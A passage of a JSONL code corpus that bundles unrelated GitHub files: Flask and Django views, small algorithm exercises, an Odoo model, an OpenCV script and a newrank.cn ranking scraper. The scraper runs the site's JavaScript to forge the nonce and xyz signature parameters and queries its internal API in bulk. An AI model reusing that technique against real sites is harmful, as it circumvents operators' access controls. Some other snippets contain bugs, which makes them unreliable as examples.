capfirst_filter(s):\n return s[0].capitalize() + s[1:] # only change 1st letter\n\n @app.template_filter(\"get_age\")\n def get_age_from_birth_year(birth_year):\n if birth_year:\n return int(datetime.datetime.now().year - birth_year)\n\n @app.template_filter(\"field_in_query\")\n def field_in_query(form_data, field):\n \"\"\"\n Determine if a field is specified in the form data, and if so return a Bootstrap\n class which will render the field accordion open.\n \"\"\"\n return \" in \" if form_data.get(field) else \"\"\n\n @app.template_filter(\"markdown\")\n def markdown(text):\n text = text.replace(\"\\n\", \" \\n\") # make markdown not ignore new lines.\n html = bleach.clean(_markdown.markdown(text), markdown_tags, markdown_attrs)\n return Markup(html)\n\n # Add commands\n Migrate(\n app, db, os.path.join(os.path.dirname(__file__), \"..\", \"migrations\")\n ) # Adds 'db' command\n from .commands import (\n add_department,\n add_job_title,\n advanced_csv_import,\n bulk_add_officers,\n link_images_to_department,\n link_officers_to_department,\n make_admin_user,\n )\n\n app.cli.add_command(make_admin_user)\n app.cli.add_command(link_images_to_department)\n app.cli.add_command(link_officers_to_department)\n app.cli.add_command(bulk_add_officers)\n app.cli.add_command(add_department)\n app.cli.add_command(add_job_title)\n app.cli.add_command(advanced_csv_import)\n\n return app\n\n\napp = 
create_app()\n","repo_name":"openoversightva/openoversight","sub_path":"OpenOversight/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"10829592756","text":"from cmath import sqrt\nfrom math import ceil\n\n\nclass Feature:\n def __init__(self, fields, data, featureName) -> None:\n self.count = 0\n self.mean = 0\n self.std = 0\n self.max = 0\n self.min = 0\n self.percentiles = [0.0, 0.0, 0.0]\n\n self.fields = fields\n self.toDecimal(data)\n self.featureName = featureName\n self.getFeatureIndex()\n self.getInfo()\n\n def toDecimal(self, data):\n self.data = []\n\n for line in data:\n tmp = []\n for val in line:\n if self.is_float(val):\n tmp.append(float(val))\n else:\n tmp.append(val)\n self.data.append(tmp)\n\n def is_float(self, str):\n try:\n f = float(str)\n return True\n except ValueError:\n return False\n \n def getFeatureIndex(self):\n tmp = 0\n for it in self.fields:\n if it.upper() == self.featureName.upper():\n self.index = tmp\n tmp += 1\n if self.index == -1: \n raise Exception(\"Could not find feature\")\n \n def getInfo(self):\n values = []\n\n for line in self.data:\n if len(line) <= self.index or line[self.index] == \"\":\n continue\n self.count += 1\n self.mean += line[self.index]\n values.append(line[self.index])\n\n values.sort()\n self.mean /= self.count\n\n for it in values:\n self.std += pow(it - (self.mean/self.count), 2)\n self.std /= self.count\n self.std = sqrt(self.std)\n self.percentiles = [\n values[ceil(0.25 * self.count)],\n values[ceil(0.5 * self.count)],\n values[ceil(0.75 * self.count)]\n ]\n self.min = values[0]\n self.max = values[self.count - 1]\n \n def getProperty(self, val):\n if val == 0:\n return \"\"\n elif val == 1:\n return self.count.real\n elif val == 2:\n return self.mean.real\n elif val == 3:\n return self.std.real\n elif val == 4:\n return self.min.real\n elif val in range(8):\n return self.percentiles[val - 5].real\n elif val == 8:\n return self.max.real\n\n\ndef openData():\n file = open(\"dataset_train.csv\", \"r\")\n str = file.read()\n\n lines = str.split(\"\\n\")\n first_line = lines.pop(0)\n fields = first_line.split(\",\")\n result = []\n for line in lines:\n tab = line.split(\",\")\n result.append(tab)\n return [fields, result]\n\ndef getFeatures(fields, data, names):\n result = []\n for it in names:\n if it != \"\":\n result.append(Feature(fields, data, it))\n return result\n\n\n[fields, data] = openData()\n\nnames = [\n \"Arithmancy\",\n \"Astronomy\",\n \"Herbology\",\n \"Defense Against the Dark Arts\",\n \"Divination\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"History of Magic\",\n \"Transfiguration\",\n \"Potions\",\n \"Care of Magical Creatures\",\n \"Charms\",\n \"Flying\"\n]\n\nfeatures = getFeatures(fields, data, names)\nfirst_column = [\n \"\",\n \"Count\",\n \"Mean\",\n \"Std\",\n \"Min\",\n \"25%\",\n \"50%\",\n \"75%\",\n \"Max\"\n]\n\nfor row in range(len(first_column)):\n print('{:>5} |'.format(first_column[row]), end=\"\")\n if row == 0:\n for name in names:\n print('{:>30} |'.format(name), end=\"\")\n print()\n else:\n for it in features:\n print('{:>30} |'.format(it.getProperty(row)), end=\"\")\n print()","repo_name":"Ppoinsinet/dslr","sub_path":"P1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12028313329","text":"from 
django.shortcuts import render, redirect\nfrom app02.models import Su\nfrom app02.forms import SuModelForm, SuEditModelForm, SuResetModelForm\nfrom django.utils.safestring import mark_safe\nfrom app02.utils import pagination\n\n\n# Create your views here.\n\n# admin\ndef su_list(request):\n \"\"\"管理员用户\"\"\"\n value = request.GET.get('search')\n dct = {}\n if value: # 若触发查询\n dct['su__contains'] = value\n su_data = Su.objects.filter(**dct)\n page_obj = pagination.Pagination(request, query_set=su_data)\n page_query_set = page_obj.page_query_set\n page_list = page_obj.show_html()\n return render(request, 'su_list.html', {'su_data': page_query_set, 'page_list': page_list})\n\n\ndef su_add(request):\n \"\"\"添加管理员\"\"\"\n if request.method == 'GET':\n form = SuModelForm\n return render(request, 'su_add.html', {'form': form})\n form = SuModelForm(data=request.POST)\n if form.is_valid():\n # print(form.cleaned_data)\n form.save()\n return redirect('/su/list/')\n return render(request, 'su_add.html', {'form': form})\n\n\ndef su_edit(request, suid):\n \"\"\"编辑管理员账号\"\"\"\n row_obj = Su.objects.filter(id=suid).first()\n if not row_obj:\n return render(request, 'error.html', {'msg': '数据不存在'})\n if request.method == 'GET':\n form = SuEditModelForm(instance=row_obj)\n return render(request, 'su_edit.html', {'form': form, 'suid': suid})\n form = SuEditModelForm(data=request.POST, instance=row_obj)\n if form.is_valid():\n form.save()\n return redirect('/su/list/')\n # return redirect(f'/su/{suid}/edit/')\n return render(request, 'su_edit.html', {'form': form, 'suid': suid})\n\n\ndef su_del(request, suid):\n \"\"\"删除管理员账号\"\"\"\n Su.objects.filter(id=suid).delete()\n return redirect('/su/list/')\n\n\ndef su_reset(request, suid):\n \"\"\"管理员账号密码重置\"\"\"\n row_obj = Su.objects.filter(id=suid).first()\n if not row_obj:\n return redirect('/su/list/')\n\n if request.method == 'GET':\n form = SuResetModelForm() # instance=row_obj 不展示密码\n return render(request, 'su_reset.html', {'form': form, 'suid': suid})\n\n form = SuResetModelForm(data=request.POST, instance=row_obj)\n if form.is_valid():\n form.save()\n return redirect('/su/list/')\n # return redirect(f'/su/{suid}/reset/')\n return render(request, 'su_reset.html', {'form': form, 'suid': suid})\n","repo_name":"yfGithubcom/Department-Management-System","sub_path":"app02/views/su.py","file_name":"su.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"11997375471","text":"import socket\r\nfrom itertools import count\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nimport seaborn as sns\r\nimport json\r\nimport time\r\n\r\nhost = '192.168.1.11'\r\nport = 5560\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\n\r\nplt.style.use('fivethirtyeight')\r\nfig = plt.figure()\r\n\r\nxa = []\r\nya = []\r\n\r\nxb = []\r\nyb = []\r\n\r\nxc = []\r\nyc = []\r\n\r\nx4 = []\r\ny4 = []\r\nxd = []\r\nyd = []\r\n\r\na = 0\r\nb = 0\r\nc = 0\r\nd = 0\r\ne = 0\r\n\r\nindex = count()\r\nsns.set()\r\nax1 = fig.add_subplot(221)\r\nsns.set()\r\nplt.xlabel(\"zaman\")\r\nplt.ylabel(\"Dahili Sıcaklık\")\r\nplt.title(\"Dahili Sıcaklık-Zaman Grafiği\")\r\n\r\nax2 = fig.add_subplot(222)\r\nsns.set()\r\nplt.xlabel(\"Zaman\")\r\nplt.ylabel(\"Parlaklık\")\r\nplt.title(\"Parlaklık-Zaman Grafiği\")\r\n\r\nax3 = 
fig.add_subplot(223)\r\nsns.set()\r\nplt.xlabel(\"Zaman\")\r\nplt.ylabel(\"Potansiyometre\")\r\nplt.title(\"Potansiyometre-Zaman Grafiği\")\r\n\r\nax4 = fig.add_subplot(224)\r\nsns.set()\r\ntime.time()\r\ndef animate(i):\r\n x1 = []\r\n y1 = []\r\n x2 = []\r\n y2 = []\r\n x3 = []\r\n y3 = []\r\n global y4\r\n global x4\r\n\r\n\r\n mesaj = s.recv(1024)\r\n veri = json.loads(mesaj)\r\n sonra = time.time()\r\n time1 = round(sonra-now,2)\r\n xa.append(time1)\r\n xb.append(time1)\r\n xc.append(time1)\r\n xd.append(time1)\r\n\r\n ya.append(veri[\"dahiliSicaklik\"])\r\n yb.append(veri[\"parlaklik\"])\r\n yc.append(veri[\"pts\"])\r\n yd.append(veri[\"sicaklik\"])\r\n\r\n if veri[\"tus\"] == 0:\r\n x1 = xa\r\n x2 = xb\r\n x3 = xc\r\n x4 = xd\r\n\r\n y1 = ya\r\n y2 = yb\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 1:\r\n x2 = xb\r\n x3 = xc\r\n x4 = xd\r\n\r\n y2 = yb\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 2:\r\n x1 = xa\r\n x3 = xc\r\n x4 = xd\r\n\r\n y1 = ya\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 3:\r\n x1 = xa\r\n x2 = xb\r\n x4 = xd\r\n\r\n y1 = ya\r\n y2 = yb\r\n y4 = yd\r\n elif veri[\"tus\"] == 4:\r\n x1 = xa\r\n x2 = xb\r\n x3 = xc\r\n x4.pop()\r\n y1 = ya\r\n y2 = yb\r\n y3 = yc\r\n y4.pop()\r\n elif veri[\"tus\"] == 5:\r\n x4.pop()\r\n y4.pop()\r\n plt.cla()\r\n\r\n ax1.plot(x1, y1, color = '#444444')\r\n\r\n ax2.plot(x2, y2, color = '#444444')\r\n\r\n ax3.plot(x3, y3, color = '#444444')\r\n\r\n ax4.plot(x4, y4, color = '#444444')\r\n\r\n\r\n plt.xlabel(\"Zaman\")\r\n plt.ylabel(\"Sıcaklık\")\r\n plt.title(\"Sıcaklık-Zaman Grafiği\")\r\n i += 1\r\n\r\nnow = time.time()\r\n\r\nani = FuncAnimation(plt.gcf(), animate, interval=900)\r\n\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"yaman158/pico-w-data-visualization","sub_path":"ubeybi.py","file_name":"ubeybi.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"70490392302","text":"'''Bài 1: Viết chương trình nhập vào từ bàn phím một danh sách gồm 10 số nguyên và thực hiện các\nyêu cầu sau:\n- Sắp xếp danh sách trên theo chiều tăng dần\n- In kết quả ra màn hình'''\na = []\nwhile True:\n n=input('Nhập phần tử của danh sách: ').upper()\n if n == \"N\":\n break\n a.append(int(n))\nprint('Danh sách trước khi sắp xếp')\nprint(a)\nprint('Danh sách sau khi sắp xếp tăng dần')\nfor i in range(len(a)):\n for j in range(i+1,len(a)):\n if a[i]>a[j]:\n a[i], a[j] = a[j], a[i]\nprint(a)","repo_name":"rekuantsun/PYTHON2-PYCHARM","sub_path":"P2-25-11-Sắp xếp và tìm kiếm/Sắp xếp/no1.py","file_name":"no1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"29207788506","text":"from openerp import models, fields, api\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n sale_comment = fields.Text(string='Internal comments')\n\n @api.multi\n def onchange_partner_id(self, invoice_type, partner_id,\n date_invoice=False, payment_term=False,\n partner_bank_id=False, company_id=False):\n val = super(AccountInvoice, self).onchange_partner_id(\n invoice_type, partner_id, date_invoice=date_invoice,\n payment_term=payment_term, partner_bank_id=partner_bank_id,\n company_id=company_id)\n if partner_id:\n partner_obj = self.env['res.partner']\n partner = partner_obj.browse(partner_id)\n comment = partner.invoice_comment or ''\n if partner.parent_id:\n comment += '\\n%s' % (partner.parent_id.invoice_comment or '')\n 
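# hand the merged partner comment back through the onchange result so the form field is pre-filled\n            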
val['value']['sale_comment'] = comment\n return val\n","repo_name":"slevenhagen/odoomrp-wip-npg","sub_path":"sale_documents_comments/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"39089027373","text":"import random\r\n\r\nn = 10\r\nr = [random.randint(1, 100) for _ in range(n)]\r\nprint(f'Массив: {r}')\r\n\r\nmin_i = 0\r\nmax_i = 0\r\nstep = 1\r\nsum_num = 0\r\n\r\nfor i in r:\r\n if r[min_i] > i:\r\n min_i = r.index(i)\r\n elif r[max_i] < i:\r\n max_i = r.index(i)\r\n\r\nif max_i - min_i < 0:\r\n step = -1\r\n\r\nfor i in r[min_i + step:max_i:step]:\r\n sum_num += i\r\n\r\nprint(f'Сумма элементов между минимальным ({r[min_i]}) и максимальным ({r[max_i]}) элементами: {sum_num}')\r\n","repo_name":"tsnv76/algorithms","sub_path":"lesson3_6.py","file_name":"lesson3_6.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"17385690350","text":"from sys import stdin, stdout\ndef readInts():\n return [int(x) for x in stdin.readline().split()]\ndef readInt():\n return int(stdin.readline())\ndef readLine():\n return stdin.readline().strip()\ndef makecase(tc):\n return \"Case #\"+str(tc)+\": \"\n#template end\n\nt = readInt()\n\nfor testcase in range(t):\n A, N = readInts()\n arr = readInts()\n arr = sorted(arr)\n\n dp = {}\n\n def getsoln(i, j, mote):\n #print(i, j, mote)\n if i > j:\n return 0\n \n if i == j:\n if mote > arr[i]:\n return 0\n else:\n return 1\n\n if (i, j, mote) in dp:\n return dp[(i, j, mote)]\n\n start = mote\n\n for k in range(i, j+1):\n if arr[k] < start:\n start += arr[k]\n else:\n break\n \n if start > arr[k]:\n return 0\n \n ans = 0\n if start > 1:\n ans = 1 + min(getsoln(k, j, start + start - 1), getsoln(k, j-1, start))\n else:\n ans = 1 + getsoln(k, j-1, start)\n \n dp[(i, j, mote)] = ans\n return ans\n \n res = getsoln(0, N - 1, A)\n\n print(\"Case #{}: {}\".format(testcase+1, res))\n","repo_name":"chethan-89/ProblemSolving","sub_path":"Codejam/motes.py","file_name":"motes.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"11267984745","text":"def knapsack_01(n, values, weights, W):\n dp = [[0] * (W + 1) for _ in range(n + 1)]\n\n for i in range(n + 1):\n for w in range(W + 1):\n if i == 0 or w == 0:\n dp[i][w] = 0\n elif weights[i - 1] <= w:\n dp[i][w] = max(\n dp[i - 1][w], dp[i - 1][w - weights[i - 1]] + values[i - 1]\n )\n else:\n dp[i][w] = dp[i - 1][w]\n\n selected_items = []\n i, w = n, W\n while i > 0 and w > 0:\n if dp[i][w] != dp[i - 1][w]:\n selected_items.append(i - 1)\n w -= weights[i - 1]\n i -= 1\n\n return dp[n][W], selected_items\n\n\nif __name__ == \"__main__\":\n n = 3\n values = [60, 100, 120]\n weights = [10, 20, 30]\n W = 50\n\n max_value, selected_items = knapsack_01(n, values, weights, W)\n print(\"Maximum value:\", max_value)\n print(\"Selected items:\", selected_items)\n","repo_name":"shreyamhetre/LabPracticals","sub_path":"DAA/Lab4.py","file_name":"Lab4.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"1706215573","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom django_models.web.models import Employee, 
Department\n\n\ndef index(request):\n employees = [x for x in Employee.objects.all() if x.department_id == 2]\n employees2 = Employee.objects.filter(department_id=2) \\\n # .order_by('years_of_experience')\n # employees2 = Employee.objects \\\n # .filter(department__name='Engineering') \\\n # .order_by('years_of_experience')\n department = Department.objects.get(pk=2)\n context = {\n 'employees': employees,\n 'employees2': employees2,\n 'department': department,\n }\n\n return render(request, 'index.html', context)\n\n\ndef department_details(request, pk, slug):\n context = {\n 'department': get_object_or_404(Department, pk=pk, slug=slug),\n }\n return render(request, 'department-details.html', context)\n\n\ndef delete_employee(request, pk):\n # get_object_or_404(Department, pk=2) \\\n # .delete()\n employee = get_object_or_404(Employee, pk=pk)\n employee.delete()\n return redirect('index')\n","repo_name":"TheShadowTM/Python_Web_Beginner","sub_path":"django_models/django_models/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"26712517526","text":"from bs4 import BeautifulSoup\n\n# Skip this for now, use below loop\n'''for link in soup.find_all('a'):\n\ttext = link.text.strip()\n\tprint text\n\nfor link in soup.find_all('a'):\n\turl = link.get('href')\n\tprint url'''\n\t\n\t\n# Last step before we have desired data. Desired data is saved in true_data.txt\nevent_data_open = open(\"event_data.txt\", \"r\")\nsoup = BeautifulSoup(event_data_open.read())\n\nevent_data = []\n\t\nfor data in soup.find_all('a'):\n\ttext = data.text.strip()\n\turl = data.get('href')\n\tevent_data.append(text)\n\tevent_data.append(url)\n\n","repo_name":"shanemduggan/old_projects","sub_path":"HereSay-Sandbox/sandbox/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"25367485328","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#   @CreateTime    : 2018/11/8 16:08\n#   @Author  : yanwj\n#   @File    : newrank_rank.py\n\n# https://www.newrank.cn/public/info/list.html?period=day&type=data  (normal page visit)\n# https://www.newrank.cn/xdnphb/list/day/rank?  (POST request)\n# https://www.newrank.cn/xdnphb/list/week/rank?  (POST request)\n# https://www.newrank.cn/xdnphb/list/month/rank?  (POST request)\nimport json\nimport logging\nimport os\nimport threading\nimport time\nfrom datetime import datetime, timedelta\nimport threadpool\nimport js2py\nfrom Tools.db_tools.mongo_tools import MongoClientTools\nfrom Tools.db_tools.redis_tools import RedisConnection\nfrom Tools.http_tools import get_response\nfrom config import CONFIG_MONGO, CONFIG_REDIS\n\nSOURCE = 'Rank'\n# daily, weekly and monthly rankings\nLIST_TYPE = ['day', 'week', 'month']\n# categories (kept in Chinese: the values are sent to the site verbatim)\nMODULES = ['时事', '民生', '财富', '科技', '创业', '汽车', '楼市', '职场', '教育', '学术', '政务', '企业',\n '文化', '百科', '健康', '时尚', '美食', '乐活', '旅行', '幽默', '情感', '体娱', '美体', '文摘']\n\nRANK_NAME_GROUP = '资讯'\n\nformdata = {\n 'end': '2018-10-31',\n 'rank_name': '时事',\n 'rank_name_group': '资讯',\n 'start': '2018-10-01',\n 'nonce': '9e832ba06',\n 'xyz': '84f3af804b2f9a101dbe8e19d2d2f1ff',\n}\n# URL templates required to compute the encrypted xyz parameter\nXYZ_PARSER_MODULES = {\n 'getFull': '',\n 'getAdvertBannerImage': '',\n 'getDate': '',\n 'getSampleRecord': \"/xdnphb/list/getSampleRecord?AppKey=joker&date={0}&nonce=\",\n 'rank': \"/xdnphb/list/{0}/rank?AppKey=joker&end={2}&rank_name={3}&rank_name_group={4}&start={1}&nonce=\",\n}\n\n\nclass GetNewrankJS:\n def __init__(self):\n with open('newrank_js_code.js', 'r', encoding='gb18030') as fr:\n self.js_code = fr.read()\n\n # .format('day', formdata['end'], formdata['rank_name'], formdata['rank_name_group'], formdata['start'])\n\n # run the JS file to obtain nonce and xyz\n def run(self, parser_module):\n while True:\n try:\n return js2py.eval_js(self.js_code.replace('666666', parser_module))\n except Exception as e:\n logging.info(parser_module + '加密错误', e)\n time.sleep(60)\n\n\nclass NewRank:\n def __init__(self):\n self.redis_conn = RedisConnection().redis_connect(**CONFIG_REDIS)\n self.conn = MongoClientTools()\n self.hours = datetime.now().hour\n self.day = datetime.now().day\n self.week = datetime.now().weekday()\n self.year = datetime.now().year\n self.month = datetime.now().month\n self.get_js_result = GetNewrankJS()\n # queue of modules awaiting encryption\n self.parser_module_queue = []\n self.get_all_parser_module()\n # url queue\n self.request_queue = []\n # self.get_request_queue() # single-threaded processing of the encryption queue\n self.thread_get_parser_url() # process the encryption queue with a thread pool\n\n def get_history_date(self):\n \"\"\"\n Collect the statistics time ranges from the stored rankings, deduplicated\n :return:\n \"\"\"\n date_range = set()\n dates = self.conn.search('WeChat_OffiAccot_Rank')\n for item in dates:\n date_range.add(item['统计时间区间'])\n return date_range\n\n def get_all_parser_module(self):\n start_date = datetime(self.year, self.month, self.day)\n # before 12:00 noon the latest day available is the day before yesterday; after noon it is yesterday\n # daily ranking: the last 7 days can be queried; a day's data only becomes available after 12:00 noon of the following day\n if self.hours > 12:\n history_days = [(start_date - timedelta(1 + n)).strftime('%Y-%m-%d') for n in range(7)]\n else:\n history_days = [(start_date - timedelta(2 + n)).strftime('%Y-%m-%d') for n in range(7)]\n\n for day in history_days:\n time_range_day = '(%s, %s)' % (day, day)\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_day):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_day)\n sample_size = self.get_samplesize(day)\n # the 24 category modules for each day\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('day', day, day, rank_name, '资讯'),\n 'list_type': '日榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': day,\n 'end_date': day,\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n # weekly ranking: current cycle 10.29-11.04; the data is finalized after 12:00 noon on Monday\n # get the start date of the most recent week\n week_start_lately = start_date - timedelta(self.week)\n week_end_lately = week_start_lately + timedelta(6)\n # Monday is 0, Sunday is 6\n # if today is not Monday, use last week's start and end dates\n if self.week > 0:\n # from the latest weekly cycle, step back two more weeks to cover the last three weeks\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(1, 4)]\n else:\n # if it is Monday, check whether it is before noon; before noon only the week before last is available\n if self.hours > 12:\n # the latest week is last week\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(1, 4)]\n else:\n # the latest week is the week before last\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(2, 5)]\n for week in history_weeks:\n time_range_week = '(%s, %s)' % (week[0], week[1])\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_week):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_week)\n sample_size = self.get_samplesize(week[1])\n # the 24 category parse templates for each week\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('week', week[0], week[1], rank_name, '资讯'),\n 'list_type': '周榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': week[0],\n 'end_date': week[1],\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n # monthly ranking: once a month, usually after noon on the 1st; only the last three months are available\n # get the current month; past noon on the 1st the latest month is last month, otherwise the month before last\n if datetime(self.year, self.month, self.day, self.hours) > datetime(self.year, self.month, 1, 12):\n # get the first and last day of each of the last three months\n history_months = [(datetime(self.year, self.month - n, 1).strftime('%Y-%m-%d'),\n (datetime(self.year, self.month - (n - 1), 1) - timedelta(1)).strftime('%Y-%m-%d'))\n for n in range(1, 4)]\n else:\n history_months = [(datetime(self.year, self.month - n, 1).strftime('%Y-%m-%d'),\n (datetime(self.year, self.month - (n - 1), 1) - timedelta(1)).strftime('%Y-%m-%d'))\n for n in range(2, 5)]\n for month in history_months:\n time_range_month = '(%s, %s)' % (month[0], month[1])\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_month):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_month)\n sample_size = self.get_samplesize(month[1])\n # the 24 category parse templates for each month\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('month', month[0], month[1], rank_name, '资讯'),\n 'list_type': '月榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': month[0],\n 'end_date': month[1],\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n return self.parser_module_queue\n\n def get_samplesize(self, date):\n \"\"\"\n Fetch the sample size\n :return: the sample size value as a str\n \"\"\"\n parser_module = XYZ_PARSER_MODULES['getSampleRecord'].format(date)\n # get the encryption result\n result = self.get_js_result.run(parser_module)\n url = 'https://www.newrank.cn' + parser_module.replace('AppKey=joker&', '') + result['nonce'] + '&xyz=' + \\\n result['xyz']\n while True:\n response = get_response(url)\n try:\n sample_size = response.json()['value']\n if sample_size:\n return sample_size\n except Exception as e:\n logging.info('获取json数据错误--》%s' % e)\n # print('获取json数据错误--》%s\\n%s' % (e, response.json()))\n time.sleep(10)\n\n def get_request_queue(self):\n pass\n # # single-threaded js decryption is extremely slow, but js2py handles the encryption without raising errors\n # for parse_module in self.parser_module_queue:\n # logging.info(' 板块:{%s}, 类别:{%s} 起始时间(%s, %s) 正在解密参数......' % (\n # parse_module['list_type'], parse_module['rank_name'], parse_module['start_date'],\n # parse_module['end_date']))\n # # get the encryption result\n # result = self.get_js_result.run(parse_module['module'])\n # parse_module['url'] = 'https://www.newrank.cn' + parse_module['module'].replace('AppKey=joker&', '') + \\\n # result['nonce'] + '&xyz=' + result['xyz']\n # logging.info('成功获取解密后的POST链接:{%s}' % parse_module['url'])\n # self.request_queue.append(parse_module)\n # break\n #\n # logging.info('全部解密完成,共计url %s 条' % len(self.request_queue))\n # return self.request_queue\n\n def thread_get_parser_url(self):\n \"\"\"\n Thread pool: run the decryption on 30 worker threads (in total daily 7*24 + weekly 3*24 + monthly 3*24 = 312 urls are needed)\n :return:\n \"\"\"\n modules = [item['module'] for item in self.parser_module_queue]\n pool = threadpool.ThreadPool(30)\n parser_queue = threadpool.makeRequests(self.get_js_result.run, modules, callback=self.callback)\n [pool.putRequest(url) for url in parser_queue]\n pool.wait()\n\n def callback(self, request, result):\n \"\"\"\n Callback for the thread pool\n :param request: the worker's arguments are available via request.args[0]\n :param result: the worker's return value\n :return:\n \"\"\"\n url = 'https://www.newrank.cn' + request.args[0].replace('AppKey=joker&', '') + result['nonce'] + '&xyz=' + \\\n result['xyz']\n logging.info('成功获取解密后的POST链接:{%s}' % url)\n for item in self.parser_module_queue:\n # store the freshly built url on the matching element of parser_module_queue\n if request.args[0] == item['module']:\n item['url'] = url\n self.redis_conn.lpush('newrank_request', item)\n # self.request_queue.append(item)\n\n def get_and_save_json(self):\n \"\"\"\n Pop url items from the redis queue, request them and store the results in mongo\n :return:\n \"\"\"\n while True:\n item = self.redis_conn.rpop('newrank_request') # read from the list the callback pushes to (was spop on a never-filled set)\n if not item:\n break\n item = eval(item)\n while True:\n response = get_response(item['url'])\n try:\n detail = response.json()\n if detail:\n detail = detail['value']\n detail.update({'samplesize': item['samplesize']})\n break\n except Exception as e:\n logging.info('获取json数据错误--》%s' % e)\n time.sleep(10)\n result = {\n '抓取时间': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n '统计时间区间': '(%s, %s)' % (item['start_date'], item['end_date']),\n '统计截止日期': datetime.strptime(item['end_date'], '%Y-%m-%d') + timedelta(days=1, hours=12),\n '榜单类型': item['list_type'],\n '模块': item['rank_name'],\n '详情': detail\n }\n logging.info('正在存入数据 {%s: %s %s} {}' % (result['榜单类型'], result['模块'], result['统计时间区间']))\n self.conn.save(result, CONFIG_MONGO['table2'] + SOURCE)\n\n def run(self):\n for i in range(3):\n th = threading.Thread(target=self.get_and_save_json)\n th.start()\n\n\nif __name__ == '__main__':\n if not os.path.exists('./log'):\n os.mkdir('./log')\n logging.basicConfig(level=logging.INFO,\n filemode=\"a\",\n filename=\"./log/newrank_rank.log\",\n format='%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s', )\n newrank = NewRank()\n newrank.run()\n\n","repo_name":"jun-ge/Crawl","sub_path":"apps/newrank/newrank_rank.py","file_name":"newrank_rank.py","file_ext":"py","file_size_in_byte":13930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5479166534","text":"import pickle\nimport numpy as np\nimport cv2\nfrom skimage.feature import hog\nfrom skimage import exposure\n\n\ndef apply_hog(img, visualise=True):\n fd, hog_im = hog(img, orientations=9, pixels_per_cell=(5, 5),\n cells_per_block=(1, 1), visualise=visualise,\n block_norm='L2-Hys')\n\n hog_image_rescaled = exposure.rescale_intensity(hog_im, in_range=(0, 10))\n return hog_image_rescaled\n\n\ndef add_disk_mask(im):\n r, c = im.shape\n rw, cl = np.ogrid[:r, :c]\n cr, cc = r / 2, c / 2\n\n mask = (((rw - cr) ** 2) + ((cl - cc) ** 2) > (cr ** 2))\n im[mask] = 0\n\n return im\n\n\ndef flatten(img):\n return img.reshape(1, img.shape[0] * img.shape[1])\n\n\ndef preprocessing_pipeline(image):\n print('processing...')\n final = apply_hog(image)\n final = add_disk_mask(final)\n final = flatten(final)\n\n return final\n\n\ndef capture_image():\n cap = cv2.VideoCapture(0)\n success, frame = cap.read()\n frame = 